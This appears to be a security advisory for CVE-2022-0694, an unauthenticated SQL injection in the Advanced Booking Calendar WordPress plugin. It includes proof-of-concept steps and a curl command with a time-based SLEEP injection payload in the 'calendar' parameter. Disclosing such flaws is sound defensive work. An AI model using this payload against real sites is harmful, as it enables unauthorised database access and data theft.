Advanced Booking Calendar < 1.7.0 – Unauthenticated SQL Injection | CVE 2022-0694

Description

The plugin does not validate and escape the calendar parameter before using it in a SQL statement via the abc_booking_getSingleCalendar AJAX action (available to both unauthenticated and authenticated users), leading to an unauthenticated SQL injection

Proof of Concept

1. Install the vulnerable plugin (advanced-booking-calendar version 1.6.9)
2. Create a new calendar (the specific configuration shouldn't matter - we just need the shortcode)
3. Create a new page with the shortcode you receive when you finish creating a calendar
4. Visit the just created page and extract the nonce (search for abc_nonce in the source)
5. Invoke the following command to induce a 5 second sleep

curl -i http://example.com/wp-admin/admin-ajax.php --data 'action=abc_booking_getSingleCalendar&abc_nonce=7d55255d19&uniqid=620ff6dacd7f8&month=3&calendar=(SELECT 4061 FROM (SELECT(SLEEP(5)))GjRo)'

Note:
+ "abc_nonce" is the required nonce
+ "uniqid" can be a random string
+ "month" should be provided and be a valid int (a month in a year)
+ "calendar" is the injection point